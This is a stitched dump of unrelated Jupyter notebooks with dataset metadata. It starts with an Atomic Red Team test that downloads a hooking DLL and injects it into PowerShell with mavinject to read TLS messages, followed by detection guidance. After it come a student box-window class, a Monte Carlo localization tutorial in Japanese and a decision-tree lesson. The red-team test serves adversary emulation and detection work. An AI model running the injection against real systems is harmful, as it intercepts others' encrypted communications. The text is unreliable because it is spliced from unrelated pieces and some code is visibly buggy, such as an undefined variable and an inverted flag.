"### Atomic Test #1 - Hook PowerShell TLS Encrypt/Decrypt Messages\nHooks functions in PowerShell to read TLS Communications\n\n**Supported Platforms:** windows\nElevation Required (e.g. root or admin)\n#### Dependencies: Run with `powershell`!\n##### Description: T1056.004x64.dll must exist on disk at specified location (#{file_name})\n\n##### Check Prereq Commands:\n```powershell\nif (Test-Path PathToAtomicsFolder\\T1056.004\\bin\\T1056.004x64.dll) {exit 0} else {exit 1}\n\n```\n##### Get Prereq Commands:\n```powershell\nNew-Item -Type Directory (split-path PathToAtomicsFolder\\T1056.004\\bin\\T1056.004x64.dll) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1056.004/bin/T1056.004x64.dll\" -OutFile \"PathToAtomicsFolder\\T1056.004\\bin\\T1056.004x64.dll\"\n\n```",
"_____no_output_____"
]
],
[
[
"Invoke-AtomicTest T1056.004 -TestNumbers 1 -GetPreReqs",
"_____no_output_____"
]
],
[
[
"#### Attack Commands: Run with `powershell`\n```powershell\nmavinject $pid /INJECTRUNNING PathToAtomicsFolder\\T1056.004\\bin\\T1056.004x64.dll\ncurl https://www.example.com\n```",
"_____no_output_____"
]
],
[
[
"Invoke-AtomicTest T1056.004 -TestNumbers 1",
"_____no_output_____"
]
],
[
[
"## Detection\nMonitor for calls to the `SetWindowsHookEx` and `SetWinEventHook` functions, which install a hook procedure.(Citation: Microsoft Hook Overview)(Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools(Citation: Volatility Detecting Hooks Sept 2012)(Citation: PreKageo Winhook Jul 2011)(Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures.(Citation: Zairon Hooking Dec 2006)(Citation: EyeofRa Detecting Hooking June 2017)\n\nRootkits detectors(Citation: GMER Rootkits) can also be used to monitor for various types of hooking activity.\n\nVerify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes(Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions.(Citation: StackExchange Hooks Jul 2012)(Citation: Adlice Software IAT Hooks Oct 2014)",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
]
] |
cb531baf72b0cf3e8c3171cbd5365c107a79674e | 8,426 | ipynb | Jupyter Notebook | src/lab2/Untitled.ipynb | EmilieYip/sdia-python | 0751b803ca20481a99410bb72c8649005e2c3804 | [
"MIT"
] | 1 | 2021-09-15T06:04:50.000Z | 2021-09-15T06:04:50.000Z | src/lab2/Untitled.ipynb | EmilieYip/sdia-python | 0751b803ca20481a99410bb72c8649005e2c3804 | [
"MIT"
] | null | null | null | src/lab2/Untitled.ipynb | EmilieYip/sdia-python | 0751b803ca20481a99410bb72c8649005e2c3804 | [
"MIT"
] | null | null | null | 22.057592 | 117 | 0.424519 | [
[
[
"#from lab2.utils import get_random_number_generator\n\n\nclass BoxWindow:\n \"\"\"[summary]\"\"\"\n\n def __init__(self, args):\n \"\"\"initialize the box window with the bounding points\n\n Args:\n args (np.array([integer])): array of the bounding points of the box\n \"\"\"\n self.bounds = args\n\n def __str__(self):\n r\"\"\"BoxWindow: :math:`[a_1, b_1] \\times [a_2, b_2] \\times \\cdots`\n\n Returns:\n str : give the bounds of the box\n \"\"\"\n mot=\"\"\n for k in range(len(self.bounds)):\n mot = mot+'['+str(self.bounds[k][0])+', '+ str(self.bounds[k][0])+']' \n if k != len(self.bounds)-1:\n mot=mot+' x '\n \n return (\"BoxWindow: \" + mot)\n\n def __len__(self):\n L=[]\n for k in range(len(self.bounds)):\n L.append(self.bounds[k][1]-self.bounds[k][0])\n return L\n\n def __contains__(self, args):\n \"\"\"args: coordonnées de point\"\"\"\n for p in range(len(args)):\n if args[p]<self.bounds[p][1] and args[p]>self.bounds[p][0]:\n continue\n else:\n return False\n return True\n \n# a=self.bounds[:,0]\n# b=self.bounds[:,1]\n# return all(np.logical_and(a<= point, point<=b))\n \n\n def dimension(self):\n \"\"\"[summary]\"\"\"\n return (len(self.bounds))\n\n def volume(self):\n \"\"\"[summary]\"\"\"\n vol=1\n for p in self.__len__():\n vol=vol*p\n return vol\n\n def indicator_function(self, args):\n \"\"\"[summary]\n\n Args:\n args ([type]): [description]\n \"\"\"\n if self.__contains__(args)==True:\n return (1)\n else:\n return (0)\n \n\n def rand(self, n=1, rng=None):\n \"\"\"Generate ``n`` points uniformly at random inside the :py:class:`BoxWindow`.\n\n Args:\n n (int, optional): [description]. Defaults to 1.\n rng ([type], optional): [description]. Defaults to None.\n \"\"\"\n rng = get_random_number_generator(rng)\n \n L=[]\n for p in range(n):\n L_petit=[]\n for k in range(len(self.bounds)):\n if self.bounds[k][0]==self.bounds[k][1]:\n L_petit.append(self.bounds[k][0])\n else:\n L_petit.append(np.random.uniform(self.bounds[k][1]-self.bounds[k][0])+self.bounds[k][0])\n L.append(L_petit)\n\n return (L)\n\n\n#heritage\nclass UnitBoxWindow(BoxWindow):\n def __init__(self, center, dimension):\n \"\"\"[summary]\n\n Args:\n dimension ([type]): [description]\n center ([type], optional): [description]. Defaults to None.\n \"\"\"\n super(BoxWindow, self).__init__(args)\n\n\n\n",
"_____no_output_____"
],
[
"import numpy as np\n\n\ndef get_random_number_generator(seed):\n \"\"\"Turn seed into a np.random.Generator instance.\"\"\"\n return np.random.default_rng(seed)",
"_____no_output_____"
],
[
"np.random.uniform(0)",
"_____no_output_____"
],
[
"import numpy as np\nc=BoxWindow(np.array([[2.5, 2.5]]))\nd=BoxWindow(np.array([[0, 5], [-1.45, 3.14], [-10, 10]]))",
"_____no_output_____"
],
[
"d.bounds.shape",
"_____no_output_____"
],
[
"d.bounds[0][1]",
"_____no_output_____"
],
[
"c.rand()",
"_____no_output_____"
],
[
"point1=[-1,1,1]\npoint2=[1,1,1]",
"_____no_output_____"
],
[
"d.__contains__(point1)",
"_____no_output_____"
],
[
"d.indicator_function(point1)",
"_____no_output_____"
],
[
"d.__len__()",
"_____no_output_____"
],
[
"d.volume()",
"_____no_output_____"
],
[
"d.__str__()",
"_____no_output_____"
],
[
"c.__str__()",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb5328c6fc80d2d0c02ceeefaa9e3c8899eaddb2 | 400,398 | ipynb | Jupyter Notebook | monte_calro_localization/monte_calro_localization.ipynb | Kuwamai/probrobo_note | 9848473c155a116ed78a2fae52c1d8da001dda88 | [
"MIT"
] | null | null | null | monte_calro_localization/monte_calro_localization.ipynb | Kuwamai/probrobo_note | 9848473c155a116ed78a2fae52c1d8da001dda88 | [
"MIT"
] | null | null | null | monte_calro_localization/monte_calro_localization.ipynb | Kuwamai/probrobo_note | 9848473c155a116ed78a2fae52c1d8da001dda88 | [
"MIT"
] | null | null | null | 696.344348 | 25,612 | 0.934308 | [
[
[
"# Monte calro localization \nMonte calro localizationのサンプルです。 ",
"_____no_output_____"
],
[
"## ライブラリのインポート",
"_____no_output_____"
]
],
[
[
"%matplotlib inline\nimport math, random # 計算用、乱数の生成用ライブラリ\nimport matplotlib.pyplot as plt # 描画用ライブラリ",
"_____no_output_____"
]
],
[
[
"## ランドマーククラス \n下のグラフに表示されている星たちです。 \nロボットはこの星を目印にして自分の位置を知ります。 \n今回は星の位置もロボットが覚えている設定です。 \nロボットがどんな風に星を見ているのかは、観測モデルのクラスを見てください。 ",
"_____no_output_____"
]
],
[
[
"class Landmarks:\n def __init__(self, array):\n self.positions = array # array = [[星1のx座標, 星1のy座標], [星2のx座標, 星2のy座標]...]\n \n def draw(self):\n # ランドマークの位置を取り出して描画\n xs = [e[0] for e in self.positions]\n ys = [e[1] for e in self.positions]\n plt.scatter(xs,ys,s=300,marker=\"*\",label=\"landmarks\",color=\"orange\")",
"_____no_output_____"
]
],
[
[
"## 移動モデル \nfwだけ前に進んで、rotだけ回転します。 \nロボットは正確に走らないし、滑ったりもするので、random.gaussによって擬似的に表現します。 \n実際のロボットでは、試しに動かしてみることで、動きの正確さや傾向を調べておきます。 ",
"_____no_output_____"
]
],
[
[
"def Movement(pos, fw, rot):\n # 移動モデル\n # posからfw前進、rot回転した位置をリストで返す\n \n # 雑音の入った前進、回転の動き\n actual_fw = random.gauss(fw, fw/10) # 10%の標準偏差でばらつく\n actual_rot = random.gauss(rot, rot/10) # 10%の標準偏差でばらつく\n dir_error = random.gauss(0.0, math.pi / 180.0 * 3.0) # 3[deg]の標準偏差\n \n # 異動前の位置を保存\n px, py, pt = pos\n\n # 移動後の位置を計算\n x = px + actual_fw * math.cos(pt + dir_error)\n y = py + actual_fw * math.sin(pt + dir_error)\n t = pt + dir_error + actual_rot # dir_errorを足す\n\n # 結果を返す\n return [x,y,t]",
"_____no_output_____"
]
],
[
[
"## 観測モデル \nランドマーククラスで指定した☆を一個ずつ見ます。 \nロボットには自分から見た☆の距離と方向がわかります。 \nこちらも移動モデル同様に正確には読み取れないので、random.gaussで再現します。 \n今回のロボットの視野角は180度、距離は1まで見れます。 ",
"_____no_output_____"
]
],
[
[
"def Observation(pos, landmark):\n # 観測モデル\n # posから見えるランドマークの距離と方向をリストで返す\n \n obss = []\n \n # センサの計測範囲\n # 距離0.1 ~ 1\n # 角度90 ~ -90[deg]\n sensor_max_range = 1.0\n sensor_min_range = 0.1\n sensor_max_angle = math.pi / 2\n sensor_min_angle = -math.pi / 2\n \n # ロボットやパーティクルの位置姿勢を保存\n rx, ry, rt = pos\n \n # ランドマークごとに観測\n for lpos in landmark.positions:\n true_lx, true_ly = lpos\n # 観測が成功したらresultをTrue\n result = True\n\n # ロボットとランドマークの距離を計算\n # センサの範囲外であればresultがFalseに\n distance = math.sqrt((rx - true_lx) ** 2 + (ry - true_ly) ** 2)\n if distance > sensor_max_range or distance < sensor_min_range:\n result = False\n\n # ロボットから見えるランドマークの方向を計算\n # こちらもセンサの範囲外であればresultがFalseに\n direction = math.atan2(true_ly - ry, true_lx - rx) - rt\n if direction > math.pi: direction -= 2 * math.pi\n if direction < - math.pi: direction += 2 * math.pi\n if direction > sensor_max_angle or direction < sensor_min_angle:\n result = False\n\n # 雑音の大きさを設定\n # これは尤度計算に使う正規分布関数の分散になる\n sigma_d = distance * 0.1 # 10%の標準偏差\n sigma_f = math.pi * 3 / 180 # 3degの標準偏差\n\n # 雑音を混ぜる\n d = random.gauss(distance, sigma_d)\n f = random.gauss(direction, sigma_f)\n \n # 観測データを保存\n z = []\n z.append([d, f, sigma_d, sigma_f, result])\n \n return z",
"_____no_output_____"
]
],
[
[
"## パーティクルクラス \n下のグラフに描画されますが、青くていっぱいある矢印たちのことです。 \nロボットと同様に星を目印にしながら動きますが、重みwを持っていますwww \nロボットと観測結果が似ていると重みの値は大きくなり、大きいほど生き残る確率が高いです。 \nなので観測がうまくいっていれば、自然とロボットの位置に近いパーティクルたちだけになっていきます。 ",
"_____no_output_____"
]
],
[
[
"class Particle:\n def __init__(self, x, y, t, w):\n # パーティクルは位置姿勢と重みを持つ\n self.pos = [x, y, t]\n self.w = w\n \nclass Particles:\n # numはパーティクルの個数\n def __init__(self, x, y, t, num):\n self.particles = []\n for i in range(num):\n # とりあえず重みはみんな一緒\n self.particles.append(Particle(x, y, t, 1.0 / num))\n \n def move(self, fw, rot):\n # パーティクルを移動\n for i in self.particles:\n i.pos = Movement(i.pos, fw, rot)\n \n def observation(self, landmarks):\n # パーティクルからの観測データzを保存\n for i in self.particles:\n i.z = Observation(i.pos, landmarks)\n \n def likelihood(self, robot):\n for particle in self.particles:\n for i in range(len(particle.z)):\n \n # 各パーティクルの観測データをロボットのものと比較\n rd, rf, sigma_rd, sigma_rf, result_r = robot.z[i]\n pd, pf, sigma_pd, sigma_pf, result_p = particle.z[i]\n \n # ロボットとパーティクル共にresultがTrueになっていれば計算\n if result_r and result_p:\n # 尤度計算は正規分布の掛け合わせ\n # ロボットと観測データが近いパーティクルは尤度が高くなる\n likelihood_d = math.exp(-(rd - pd) ** 2 / (2 * (sigma_rd ** 2))) / (sigma_rd * math.sqrt(2 * math.pi))\n likelihood_f = math.exp(-(rf - pf) ** 2 / (2 * (sigma_rf ** 2))) / (sigma_rf * math.sqrt(2 * math.pi))\n # 尤度をパーティクルの重みとして保存\n particle.w *= likelihood_d * likelihood_f\n \n def resampling(self):\n num = len(self.particles)\n # 重みリストの作成\n ws = [e.w for e in self.particles]\n # 重みの大きいパーティクルほど高い確率で選ばれる\n ps = random.choices(self.particles, weights = ws, k = num)\n # 選ばれたパーティクルの位置、方向を引き継いで、再び均等な重みのパーティクルを作成\n self.particles = [Particle(*e.pos, 1.0 / num) for e in ps]\n \n # 矢印の描画に必要な位置と方向を計算して描画\n def draw(self, c = \"blue\", lbl = \"particles\"):\n xs = [p.pos[0] for p in self.particles]\n ys = [p.pos[1] for p in self.particles]\n vxs = [math.cos(p.pos[2]) for p in self.particles]\n vys = [math.sin(p.pos[2]) for p in self.particles]\n plt.quiver(xs, ys, vxs, vys, color = c, label = lbl, alpha = 0.7)",
"_____no_output_____"
]
],
[
[
"## ロボットクラス \n基本的な構造はパーティクルと変わりません。 \nわかりやすさのために位置を配列に保存して、軌跡を表示しています。 \n下のグラフを見るとわかると思います。 ",
"_____no_output_____"
]
],
[
[
"class Robot:\n def __init__(self, x, y, rad):\n # ステップごとにロボットの姿勢の真値が入った配列\n self.actual_poses = [[x,y,rad]]\n\n def move(self,fw,rot):\n # ロボットの位置を記録する(軌跡を残すために配列に入れてる)\n self.actual_poses.append(Movement(self.actual_poses[-1], fw, rot))\n \n def observation(self, landmarks):\n # 現在地から見た観測データの保存\n self.z = Observation(self.actual_poses[-1], landmarks)\n\n # 矢印の描画に必要な位置と方向を計算して描画\n def draw(self, sp):\n xs = [e[0] for e in self.actual_poses]\n ys = [e[1] for e in self.actual_poses]\n vxs = [math.cos(e[2]) for e in self.actual_poses]\n vys = [math.sin(e[2]) for e in self.actual_poses]\n plt.quiver(xs,ys,vxs,vys,color=\"red\",label=\"actual robot motion\")",
"_____no_output_____"
]
],
[
[
"## 描画関数 \nグラフの大きさなどを設定し、順に描画メソッドを実行させています。 ",
"_____no_output_____"
]
],
[
[
"def draw(i):\n # グラフの設定\n fig = plt.figure(i, figsize=(8,8))\n sp = fig.add_subplot(111,aspect='equal')\n sp.set_xlim(-1.0,1.0)\n sp.set_ylim(-0.5,1.5)\n \n # パーティクル、ロボット、ランドマークの描画\n particles.draw()\n robot.draw(sp)\n actual_landmarks.draw()\n \n plt.legend()",
"_____no_output_____"
]
],
[
[
"## シミュレーション開始 \nロボット、パーティクル、ランドマークの位置を指定し、シミュレーションを始めます。 ",
"_____no_output_____"
]
],
[
[
"# ロボット、パーティクル、ランドマークの配置と初期化\nrobot = Robot(0, 0, 0)\nparticles = Particles(0, 0, 0, 30)\nactual_landmarks = Landmarks([[-0.5,0.0],[0.5,0.0],[0.0,0.5]])\ndraw(0)\n\nfor i in range(1,18):\n # ロボットとパーティクルの移動\n robot.move(0.2,math.pi / 180.0 * 20)\n particles.move(0.2,math.pi / 180.0 * 20)\n \n # ロボットとパーティクルの観測\n robot.observation(actual_landmarks)\n particles.observation(actual_landmarks)\n \n # 尤度計算\n particles.likelihood(robot)\n \n # リサンプリング\n particles.resampling()\n \n # 描画\n draw(i)",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
]
] |
cb5333de4b32d0e5f0c36b569452b3612a66dd7e | 869,810 | ipynb | Jupyter Notebook | Module 2: Supervised Learning/Correlation, supervised segmentation, and tree-structured models 2017.ipynb | jattenberg/SternPythonDataScience2018 | 78dbb8190faaf3946aac56efa2dd181554165e7d | [
"MIT"
] | 12 | 2018-02-11T01:32:26.000Z | 2021-04-19T07:25:17.000Z | Module 2: Supervised Learning/Correlation, supervised segmentation, and tree-structured models 2017.ipynb | jattenberg/SternPythonDataScience2018 | 78dbb8190faaf3946aac56efa2dd181554165e7d | [
"MIT"
] | null | null | null | Module 2: Supervised Learning/Correlation, supervised segmentation, and tree-structured models 2017.ipynb | jattenberg/SternPythonDataScience2018 | 78dbb8190faaf3946aac56efa2dd181554165e7d | [
"MIT"
] | 8 | 2018-02-07T00:54:32.000Z | 2022-01-13T05:01:48.000Z | 908.892372 | 160,194 | 0.940389 | [
[
[
"# Introduction to Data Science\n## From correlation to supervised segmentation and tree-structured models\n\nSpring 2018 - Profs. Foster Provost and Josh Attenberg\n\nTeaching Assistant: Apostolos Filippas\n\n\n***",
"_____no_output_____"
],
[
"### Some general imports",
"_____no_output_____"
]
],
[
[
"import os\nimport numpy as np\nimport pandas as pd\nimport math\nimport matplotlib.pylab as plt\nimport seaborn as sns\n\n%matplotlib inline\nsns.set(style='ticks', palette='Set2')",
"_____no_output_____"
]
],
[
[
"Recall the automobile MPG dataset from last week? Because its familiar, let's reuse it here.",
"_____no_output_____"
]
],
[
[
"url = \"http://archive.ics.uci.edu/ml/machine-learning-databases/auto-mpg/auto-mpg.data-original\"\ncolumn_names = ['mpg', 'cylinders', 'displacement', 'horsepower', 'weight', 'acceleration',\n 'model', 'origin', 'car_name']\n\nmpg_df = pd.read_csv(url,\n delim_whitespace=True,\n header=None,\n names=column_names).dropna()",
"_____no_output_____"
]
],
[
[
"Rather than attempt to predict the MPG from the other aspects of a car, let's try a simple classification problem, whether a car gets good milage (high MPG) or not",
"_____no_output_____"
]
],
[
[
"mpg_df[\"mpg\"].hist()",
"_____no_output_____"
]
],
[
[
"Arbitrarily, let's say that those cars with a MPG greater than the median get good miles per gallon. ",
"_____no_output_____"
]
],
[
[
"median_mpg = mpg_df[\"mpg\"].median()\nprint (\"the median MPG is: %s\" % median_mpg)\n\ndef is_high_mpg(mpg):\n return 1 if mpg > median_mpg else 0\n\nmpg_df[\"is_high_mpg\"] = mpg_df[\"mpg\"].apply(is_high_mpg)",
"the median MPG is: 22.75\n"
]
],
[
[
"We'd like to use information contained in the other automobile quantities to predict whether or not the car is efficient. Let's take a look at how well these observables \"split\" our data according to our target.",
"_____no_output_____"
]
],
[
[
"def visualize_split(df, target_column, info_column, color_one=\"red\", color_two=\"blue\"):\n plt.rcParams['figure.figsize'] = [15.0, 2.0]\n color = [\"red\" if x == 0 else \"blue\" for x in df[target_column]]\n plt.scatter(df[info_column], df[target_column], c=color, s=50)\n plt.xlabel(info_column)\n plt.ylabel(target_column)\n plt.show()\n \nvisualize_split(mpg_df, \"is_high_mpg\", \"weight\")",
"_____no_output_____"
]
],
[
[
"Above we see a scatter plot of all possible car weights and a color code that represents our target variable (is good mpg).\n- Blue dots correspond to fuel efficient cars, red dots are fuel inefficient cars\n- The horizontal position is the weight of the car\n- The vertical position separates our two classes\n\nClearly car weight and high MPG-ness are correlated.",
"_____no_output_____"
],
[
"Looks like cars weighing more than 3000 lbs tend to be inefficient. How effective is this decision boundary? Let's quantify it!",
"_____no_output_____"
],
[
"***\n\n\n**Entropy** ($H$) and **information gain** ($IG$) au useful tools for measuring the effectiveness of a split on the data. Entropy measures how random data is, information gain is a measure of the reduction in randomness after performing a split.\n\n<table style=\"border: 0px\">\n<tr style=\"border: 0px\">\n<td style=\"border: 0px\"><img src=\"images/dsfb_0304.png\" height=80% width=80%>\nFigure 3-4. Splitting the \"write-off\" sample into two segments, based on splitting the Balance attribute (account balance) at 50K.</td>\n<td style=\"border: 0px; width: 30px\"></td>\n<td style=\"border: 0px\"><img src=\"images/dsfb_0305.png\" height=75% width=75%>\nFigure 3-5. A classification tree split on the three-values Residence attribute.</td>\n</tr>\n</table>\n\nGiven the data, it is fairly straight forward to calculate both of these quantities.",
"_____no_output_____"
],
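[
"Concretely, for a segment whose classes occur with proportions $p_i$, the functions below compute the entropy\n\n$$H = -\\sum_i p_i \\log_2 p_i,$$\n\nand the information gain of splitting a parent set of $n$ examples into children $c$ (each containing $n_c$ examples):\n\n$$IG = H(\\mathrm{parent}) - \\sum_c \\frac{n_c}{n} H(c).$$",
"_____no_output_____"
],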
[
"##### Functions to get the entropy and IG",
"_____no_output_____"
]
],
[
[
"\ndef entropy(target_column):\n \"\"\"\n computes -sum_i p_i * log_2 (p_i) for each i\n \"\"\"\n # get the counts of each target value\n target_counts = target_column.value_counts().astype(float).values\n total = target_column.count()\n \n # compute probas\n probas = target_counts/total\n \n # p_i * log_2 (p_i)\n entropy_components = probas * np.log2(probas)\n # return negative sum\n return - entropy_components.sum()\n\ndef information_gain(df, info_column, target_column, threshold):\n \"\"\"\n computes H(target) - H(target | info > thresh) - H(target | info <= thresh)\n \"\"\"\n \n data_above_thresh = df[df[info_column] > threshold]\n data_below_thresh = df[df[info_column] <= threshold]\n \n H = entropy(df[target_column])\n entropy_above = entropy(data_above_thresh[target_column])\n entropy_below = entropy(data_below_thresh[target_column])\n \n ct_above = data_above_thresh.shape[0]\n ct_below = data_below_thresh.shape[0]\n \n tot = float(df.shape[0])\n \n \n return H - entropy_above*ct_above/tot - entropy_below*ct_below/tot ",
"_____no_output_____"
]
],
[
[
"Now that we have a way of calculating $H$ and $IG$, let's test our prior hunch, that using 3000 as a split on weight allows us to determine if a car is high MPG using $IG$.",
"_____no_output_____"
]
],
[
[
"\nthreshold = 3000\nprior_entropy = entropy(mpg_df[\"is_high_mpg\"])\nIG = information_gain(mpg_df, \"weight\", \"is_high_mpg\", threshold)\nprint (\"IG of %.4f using a threshold of %.2f given a prior entropy of %.4f\" % (IG, threshold, prior_entropy))\n",
"IG of 0.4632 using a threshold of 3000.00 given a prior entropy of 1.0000\n"
]
],
[
[
"How good was our guess of 3000? Let's loop through all possible splits on weight and see what is the best!",
"_____no_output_____"
]
],
[
[
"def best_threshold(df, info_column, target_column, criteria=information_gain):\n maximum_ig = 0\n maximum_threshold = 0\n\n for thresh in df[info_column]:\n IG = criteria(df, info_column, target_column, thresh)\n if IG > maximum_ig:\n maximum_ig = IG\n maximum_threshold = thresh\n \n return (maximum_threshold, maximum_ig)\n\nmaximum_threshold, maximum_ig = best_threshold(mpg_df, \"weight\", \"is_high_mpg\")\n\nprint (\"the maximum IG we can achieve splitting on weight is %.4f using a thresh of %.2f\" % (maximum_ig, maximum_threshold))",
"the maximum IG we can achieve splitting on weight is 0.5017 using a thresh of 2755.00\n"
]
],
[
[
"Other observed features may also give us a strong clue about the efficiency of cars.",
"_____no_output_____"
]
],
[
[
"predictor_cols = ['cylinders', 'displacement', 'horsepower', 'weight', 'acceleration', 'model', 'origin']\n\nfor col in predictor_cols:\n visualize_split(mpg_df, \"is_high_mpg\", col)",
"_____no_output_____"
]
],
[
[
"This now begs the question: what feature gives the most effective split? ",
"_____no_output_____"
]
],
[
[
"def best_split(df, info_columns, target_column, criteria=information_gain):\n maximum_ig = 0\n maximum_threshold = 0\n maximum_column = \"\"\n \n for info_column in info_columns:\n thresh, ig = best_threshold(df, info_column, target_column, criteria)\n \n if ig > maximum_ig:\n maximum_ig = ig\n maximum_threshold = thresh\n maximum_column = info_column\n\n return maximum_column, maximum_threshold, maximum_ig\n\nmaximum_column, maximum_threshold, maximum_ig = best_split(mpg_df, predictor_cols, \"is_high_mpg\")\n\nprint (\"The best column to split on is %s giving us a IG of %.4f using a thresh of %.2f\" % (maximum_column, maximum_ig, maximum_threshold))",
"the best column to split on is displacement giving us a IG of 0.5675 using a thresh of 183.00\n"
]
],
[
[
"### The Classifier Tree: Recursive Splitting",
"_____no_output_____"
],
[
"Of course, splitting the data one time sometimes isn't enough to make accurate categorical predictions. However, we can continue to split the data recursively until we achieve acceptable results. This recursive splitting is the basis for a \"decision tree classifier\" or \"classifier tree\", a popular and powerful class of machine learning algorithm. In particular, this specific algorithm is known as ID3 for Iterative Dichotomizer. \n\nWhat are some other ways you might consider splitting the data?",
"_____no_output_____"
]
],
[
[
"def Plot_Data(df, info_col_1, info_col_2, target_column, color1=\"red\", color2=\"blue\"):\n # Make the plot square\n plt.rcParams['figure.figsize'] = [12.0, 8.0]\n \n # Color\n color = [color1 if x == 0 else color2 for x in df[target_column]]\n \n # Plot and label\n plt.scatter(df[info_col_1], df[info_col_2], c=color, s=50)\n plt.xlabel(info_col_1)\n plt.ylabel(info_col_2)\n plt.xlim([min(df[info_col_1]) , max(df[info_col_1]) ])\n plt.ylim([min(df[info_col_2]) , max(df[info_col_2]) ])\n plt.show()\n\nplt.figure(figsize=[7,5])\nPlot_Data(mpg_df, \"acceleration\", \"weight\",\"is_high_mpg\")",
"_____no_output_____"
]
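,
[
"# A minimal sketch (added for illustration, not part of the original lesson) of the recursive\n# splitting behind ID3, reusing the best_split() helper defined above. Each node either returns a\n# majority-class prediction or splits on the best column/threshold and recurses on the two halves.\ndef recursive_split(df, info_columns, target_column, depth=0, max_depth=2):\n    counts = df[target_column].value_counts()\n    majority = counts.idxmax()\n    # stop when the node is pure or the depth limit is reached\n    if len(counts) == 1 or depth >= max_depth:\n        return {\"prediction\": majority, \"n\": len(df)}\n    column, thresh, ig = best_split(df, info_columns, target_column)\n    if ig == 0:\n        return {\"prediction\": majority, \"n\": len(df)}\n    left = df[df[column] <= thresh]\n    right = df[df[column] > thresh]\n    return {\"split_column\": column, \"threshold\": thresh, \"IG\": round(ig, 4),\n            \"left\": recursive_split(left, info_columns, target_column, depth + 1, max_depth),\n            \"right\": recursive_split(right, info_columns, target_column, depth + 1, max_depth)}\n\nrecursive_split(mpg_df, predictor_cols, \"is_high_mpg\")",
"_____no_output_____"
]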
],
[
[
"Rather than build a classifier tree from scratch (think if you could now do this!) let's use sklearn's implementation which includes some additional functionality. ",
"_____no_output_____"
]
],
[
[
"from sklearn.tree import DecisionTreeClassifier\n\n# Let's define the model (tree)\ndecision_tree = DecisionTreeClassifier(max_depth=1, criterion=\"entropy\") # Look at those 2 arguments !!! \n\n# Let's tell the model what is the data\ndecision_tree.fit(mpg_df[predictor_cols], mpg_df[\"is_high_mpg\"])",
"_____no_output_____"
]
],
[
[
"We now have a classifier tree, let's visualize the results!",
"_____no_output_____"
]
],
[
[
"from IPython.display import Image\nfrom sklearn.tree import export_graphviz\n\ndef visualize_tree(decision_tree, feature_names, class_names, directory=\"./images\", name=\"tree\",proportion=True):\n \n # Export our decision tree to graphviz format\n dot_name = \"%s/%s.dot\" % (directory, name)\n dot_file = export_graphviz(decision_tree, out_file=dot_name,\n feature_names=feature_names, class_names=class_names,proportion=proportion)\n \n # Call graphviz to make an image file from our decision tree\n image_name = \"%s/%s.png\" % (directory, name)\n os.system(\"dot -Tpng %s -o %s\" % (dot_name, image_name))\n # to get this part to actually work, you may need to open a terminal window in Jupyter and run the following command \"sudo apt install graphviz\"\n \n # Return the .png image so we can see it\n return Image(filename=image_name)\n\nvisualize_tree(decision_tree, predictor_cols, [\"n\", \"y\"])",
"_____no_output_____"
]
],
[
[
"Let's look at the `\"acceleration\"`, `\"weight\"`, including the **DECISION SURFACE!!**\n\nMore details for this graph: [sklearn decision surface](http://scikit-learn.org/stable/auto_examples/tree/plot_iris.html)",
"_____no_output_____"
]
],
[
[
"def Decision_Surface(data, col1, col2, target, model, probabilities=False):\n # Get bounds\n x_min, x_max = data[col1].min(), data[col1].max()\n y_min, y_max = data[col2].min(), data[col2].max()\n \n # Create a mesh\n xx, yy = np.meshgrid(np.arange(x_min, x_max,0.5), np.arange(y_min, y_max,0.5))\n meshed_data = pd.DataFrame(np.c_[xx.ravel(), yy.ravel()])\n \n tdf = data[[col1, col2]]\n model.fit(tdf, target)\n if probabilities:\n Z = model.predict(meshed_data).reshape(xx.shape)\n else:\n Z = model.predict_proba(meshed_data)[:, 1].reshape(xx.shape)\n \n plt.figure(figsize=[12,7])\n plt.title(\"Decision surface\") \n plt.ylabel(col1)\n plt.xlabel(col2)\n \n if probabilities:\n # Color-scale on the contour (surface = separator)\n cs = plt.contourf(xx, yy, Z,cmap=plt.cm.coolwarm, alpha=0.4)\n else:\n # Only a curve/line on the contour (surface = separator)\n cs = plt.contourf(xx, yy, Z, levels=[-1,0,1],cmap=plt.cm.coolwarm, alpha=0.4)\n \n color = [\"blue\" if t == 0 else \"red\" for t in target]\n plt.scatter(data[col1], data[col2], color=color )\n plt.show() \n\ntree_depth=1\nDecision_Surface(mpg_df[predictor_cols], \"acceleration\", \"weight\", mpg_df[\"is_high_mpg\"], DecisionTreeClassifier(max_depth=tree_depth, criterion=\"entropy\"), True)",
"_____no_output_____"
]
],
[
[
"How good is our model? Let's compute accuracy, the percent of times where we correctly identified that a car was high MPG.",
"_____no_output_____"
]
],
[
[
"from sklearn import metrics\nprint ( \"Accuracy = %.3f\" % (metrics.accuracy_score(decision_tree.predict(mpg_df[predictor_cols]), mpg_df[\"is_high_mpg\"])) )",
"Accuracy = 0.903\n"
]
],
[
[
"What are some other ways we could classify the data? Last class we used linear regression, let's take a look to see how that partitions the data",
"_____no_output_____"
]
],
[
[
"from sklearn import linear_model\nimport warnings\nwarnings.filterwarnings('ignore')\n\nDecision_Surface(mpg_df[predictor_cols], \"acceleration\", \"weight\", mpg_df[\"is_high_mpg\"], linear_model.Lasso(alpha=0.01), True)\n",
"_____no_output_____"
]
],
[
[
